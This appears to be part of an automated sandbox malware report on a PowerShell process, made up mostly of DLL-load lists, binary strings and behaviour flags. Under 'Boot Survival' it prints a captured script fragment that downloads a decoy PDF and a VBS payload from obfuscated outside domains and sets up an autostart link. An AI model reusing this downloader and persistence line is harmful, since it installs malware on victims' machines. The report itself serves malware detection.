      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdbm source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2108563780.000001A0C0426000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7B29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2105240541.000001A0C017E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3K source: powershell.exe, 00000003.00000002.2104667258.000001A0C0108000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbG source: powershell.exe, 00000000.00000002.2319308884.00000293F7AC0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbr source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F26D67 push esp; retf 0_2_00007FF848F26D68
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27967 push esp; retf 0_2_00007FF848F27968
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848FF1C28 pushad ; retf 0_2_00007FF848FF1C29
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848FE0D6C push eax; ret 3_2_00007FF848FE0D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htbkqwww.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.pdf';getit -fz $flol -oulv 'http://www.bluhwamaxxlashwar.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
